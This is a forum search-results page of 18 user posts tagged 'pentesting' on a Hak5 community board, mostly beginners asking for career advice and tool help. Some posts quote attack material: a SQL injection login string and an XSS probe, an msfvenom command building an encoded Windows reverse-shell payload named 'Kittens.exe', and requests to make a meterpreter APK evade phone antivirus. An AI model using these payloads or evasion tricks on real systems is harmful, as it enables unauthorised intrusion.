Jump to content

Search the Community

Showing results for tags 'pentesting'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 18 results

  1. I sell an Ubertooth One, a Throwing Star LAN Tap Pro and a Rubber Ducky. In perfect conditions, material left from a former pentesting lab and never used (Rubber ducky still brand new, in its original sealed plastic bag). All for 160 euros + shipping. I can also send to most countries in Europe via certified mail or UPS/DHL, etc.
  2. Hey there! I am getting started within the coding/cybersecurity/ceh/pentesting world. I have a friend who's very savvy at all things tech, and I know they prize their Hak5 gear because they take it with them literally everywhere, so I figured getting to know this community might be a good place to start and get some direction with the best place to begin learning things whether that's YT, opensource projects, just working toward certs, etc. Thanks in advance for any and all help! a2d
  3. Hi Guys, Having rooted the nexus 6p (again), downloaded the latest version of NetHunter for the android device, I was wondering if anyone else is using it without problems? Cheers 😎
  4. Hello forum, I'm trying to create an ssh tunnel between my turtle and my ssh server (which I configured properly to avoid to buy a specific vps), so following the tutorial video... https://www.youtube.com/watch?v=uIdvvrDrRj0 instead to buy a vps I configured my own ssh server on parrot security os , also setting options with no-ip and ssh port it's 1986 already port forwarded on my router... So if I try to connect to my own "vps" using ssh from another terminal, connection works properly but also turtle seems to connect to my server , however autossh connection does not work I'll show you my configurations screens below (with comments)... p.s I added user called turtle to connect my turtle to my server ... what doesn't work is when I try to : ssh root@localhost -p 2222 from another terminal to connect to my lan turtle. screens: generating my keys (I repeat that I'm using te port 1986 because already port forwarded and it works , so it isn't the problem): https://imgur.com/sJ2tUBC as you can see my ssh server works properly... let's configure lan turtle... https://imgur.com/EpzLOuL i set host port and user that works as shown above https://imgur.com/7rtAQa7 These are the generated keys on server so I copied them with copy_key always in auto ssh configuration (are double because I generated them 2 times in order to test) https://imgur.com/pUj6eQv At least the ssh auto configuration (should be these based on my configurations but I don't understand if I save in a second moment appears strage characters like ' in "Port") https://imgur.com/UoKmcRP From another terminal I should be able to connect to lan turtle connecting to turtle ssh account and than on root@localhost but 2222 port seems not working and if I try for 1986 it appears root of ssh server and not of lan turtle..no turtle shell appears and no connection is successfully established.... I repeat that connection between lan turtle and my open ssh server seems work, anyway there is something wrong.... Is maybe because I have to configure some advanced options in the ssh linux server file (/etc/ssh/ssh_config) ? Help me , let me understand what is going wrong guys, thank you.
  5. So I want to get into a career of pen-testing I just want to know some ideas of os (going to be kali) and laptops. thx, cameron
  6. I recent got a Pineapple NANO, just got the SD card and so far the device seems to be working. What I wanted to ask the group, I have to do a demonstration to a group of IT Directors on hacking and some of the tricks Pen Testers use. Any suggestions on what modules look the most impressive and are demonstrable in front of group. Any suggestions would be appreciated. I link to any tutorials you think I should look over would also be appreciated. Thanks
  7. khudz

    XSS Help

    Hello team, I'm new here as I am new to Penetration testing, my next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server, I successfully finished with the Win XP in all aspects as for the CentOS I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information but that was it, I tried using scripts (<script>alert(1);</script>) but nothing worked, nessus scan showed it's XSS vulnerable. I guess my main point is how further can I dig into the target and how? Cheers
  8. I just installed virtual box and im running linux mint 18.1. Can you explain how i would attack my own VM on my system?
  9. Hello there, I am looking for hackers to test our tools. Basically our tools are used for static analysis in source code and binaries. We want to make our tools the most accurate so we need users to report false positives. If you're intrested you can contact me through twitter and or email. https://twitter.com/q_analysis_ https://q-analysis.com/ support@q-analysis.com If you do accept this offer you will have free access to our tools for a year. Thanks !!!
  10. Hi Guys, I'm learning penetration testing and need some help with escalating my privileges on a Red Hat 9 (Shrike - kernel 2.4.20-8 - http://archive.download.redhat.com/pub/redhat/linux/9/en/iso/i386/) test VM. I'm stuck.... I'm using this exploit (https://www.exploit-db.com/exploits/160/) and keep getting "Segmentation fault" errors. I've tried others as well that should work but all appear to give me the same error. I could not find any helpful information on how to resolve this. I've tried debugging the code but I'm not a programmer so it's been a pain, also tired changing RAM size and running the VM on different host machines as some suggested online but no luck. Anyone has any ideas or suggestions? I can provide more information if need be. Any help would be greatly appreciated. Here a screenshot: https://imgur.com/a/7mFHI Thanks.
  11. Hello everyone i'm new to the forums and just got my new TETRA loving it. I have been slowly but steadily educating myself in hacking over the last 2 years last year went to Defcon and this august i plan to again the reason being is i would love to get a job in the IT industry (FYI i poor coffee weight now at america's Favorite shit coffee house) but every night i come home and work on my CCNA figure it would be a good first credential to pick up to move into a IT job i guess why i'm posting this i would love to hear from others on tip as far as moving towards a decent job at least one that pays me better then 10.25hr and i don't burn myself on a daily bases for minimum wage. In the long run i would love to be a professional pen tester going to Defcon so far has been well worth it have met like minded people and made friends.
  12. Howdy All, I am very new to the concept of network testing. Currently, I run my Intranet (2 desktops, a laptop, and a handful of smartphones) behind a standard router/modem, and utilizing firewalls and anti-virus/malware tools. But I cannot shake the thought that I might be dropping the ball somewhere... 1. Is there something I can do to test and see if I have any vulnerabilities I can shore-up? 2. Are there ways I can check and see if others are attempting to gain access to my home network from the outside? Thanks ahead o' time guys! Keep up the good work! Uncle Gabe BTW - Where in Land Sakes, did you get that OLD avatar??? PLEASE, let me update it!
  13. I've been using Kali for a long time and I'm comfortable with it but I feel it's time to move on. From what I understand, since it is an OS strictly for pentesting it doesn't take into account the user's own security. In the past I've used Kali for brief periods of time without worrying about the security of the system I was on. However, if I am to become better at pentesting then I must upgrade the tools I use. I also want to practice on the same system I would use for actual pentests. Which OS can you recommend that provides the power and tool selection that Kali does but also provides security similar to Tails? I know there won't be a perfect cross-over but I'm looking for the closest one available. I have found a list of pentesting distros including BlackArch (which I've used briefly), BackBox, and ArchAssault. I'll continue researching but would appreciate your opinions and experiences with these various distros.
  14. Hi guys, I was recently looking to get a cheap laptop to stay portable when having some fun with the pineapple, but then I thought; what if I wanted to do some bruteforcing on the go? Then I would have to use its GPU. But I doubt that a cheap laptop will get the job done fast enough on the graphics side. So I did some looking around and found a few external GPU adapters. As long as your laptop has a PCIe slot, you should be good to go. And although it goes through PCIe x2 interface, I think it shouldn’t even matter when using the card for number crunching …as long as you have enough juice to power the thing (car charger adapter for example or just a large battery). This way if you already have a good graphics card, you can take it with you to do something a little more serious than what you could with a laptop onboard GPU. Anyway, I just wanted to share this with you because I thought that maybe this would be interesting for you guys to check out, discuss and have some fun with. Tell me what you think
  15. Hi, I have a great interest in computer security and research exploits and pen-testing techniques as a hobby. Recently I started looking into mobile devices. Android in specific because of the stagefright exploit that was recently released but I'm not an expert so I'm having trouble trying to use it. I usually use metasploit for my testing but not sure how to use the stagefright exploit with it. All I've been able to do so far is create an apk file with an android meterpreter payload and set up a multi handler listener in a vps so I can catch the connections. It works on some phones if it doesn't have any security on them but when they have lookout or some other anti-virus software it kills the sessions or doesn't allow them at all. I'm looking for a little help. Is there a way to encode the apk file so it doesn't get detected by the anti-virus software or another attack that should be more successful like embedding the payload on a web page? Also if anyone can point me in the right direction on how to use the stagefright exploit to create a meterpreter session I would appreciate it. Thanks,
  16. I've been pentesting on on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating vai Veil-Evasion and msfvenom. For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to me on my handler on kali and it works BUT thats only when AV is turned off, otherwise my payloads are detected by AV (AVG) Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong? Here is an example of one of my payloads root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST= LPORT=4444 > Kittens.exe
  17. Hey! Tested on the iPhone 4 running Ios 7 jail broken by using evasion7 I wanted to talk about using a iDevice (ios 7)as a pen testing device . [ Noob Friendly ] First off , why should you use a iDevice as a pen testing device ? Its portable Not noticeable it looks cool :) its pretty fast IOS == Unix It can easily be used with the pineapple ;) Let's move on , so how do you make your iDevice into a pentesting device ? First you need jailbreak your iDevice (eg ; Evasion7) Open Cydia Adding repositories by going to "Manage" and then "Sources" and then "edit" and then "add" Then add all these repositories :: http://cydia.myrepospace.com/Boo/ http://ininjas.com/repo/ http://cydia.xsellize.com/ When that's done . click on "http://ininjas.com/repo/" and scroll down until you see "Metasploit" then click on "Metasploit" and then click on "edit" and then click on "Install" When that's done go back and scroll until you see "Aircrack-ng" and the click on it and install just like previous when thats done install Auto Reconnect , Mobile terminal ,beEF, CUPP, Dsniff Suite , dsniff-fr0g , Ettercap-ng GTk , Ettercap No GTK , Evil Grade ,iAHT, iPwN ,John the Ripper, Low Orbit Ion Cannon , NBTScan, Nikto2, Nmap , Pirni ,Ruby 1.8.6 , Searchsploit , SSLstrip , Wordlists , XSSer , xterm , IWep , SET (not the one thats called Social Engineering Toolkit but the one thats called SET!!) , OpenSSH ! , iSSH I know that are alot of tools and it will take you some time but when its done you have an awesome pentesting device ! When you Installed all those Tools open Mobile terminal or xterm and type "su" and fill in your password "standard password is :: alpine " then type cd /pentest and there are all your tools . Make sure you go to /pentest/exploits/SET/config and open the set_config and change the metasploit path to the path where metasploit is instaleld. If you need help setting up the other tools (should work fine) or if you have any problems feel free to leave them below . Enjoy your simple but powerful pen testing device ;) Merry Christmas! :) - Jesse
  18. I'm not completely new to pentesting and Im not completely new to Kali Linux, We've been using Kali Linux for Everything at school. I have Kali on a usb I boot up everything works great. Recently I was given a hp Chromebook 14 and decided to install Kali using the crouton method. The distro is bare so you have to install a metapackage after the initial setup. I installed the kali-linux-top10 which is the top 10 security pentesting tools. Today I finally sat down for the first time to really play around with Kali and to Pentest my network which I did and I found a few vulnerable ports on another laptop running in the house so I decided to use metasploit and see what I could get my hands on but i got this *] Starting the Metasploit Framework console.../[-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host "localhost" ( and accepting TCP/IP connections on port 5432? So none of the exploits are working..... I know this is a user error and the fix has to be something simple but i could use some help .....any suggestions?
  • Create New...